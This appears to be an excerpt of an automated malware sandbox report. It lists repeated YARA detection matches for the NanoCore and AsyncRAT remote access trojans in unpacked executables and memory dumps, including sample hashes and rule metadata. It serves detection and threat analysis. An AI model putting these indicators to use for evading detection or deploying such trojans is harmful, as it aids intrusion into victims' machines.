Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
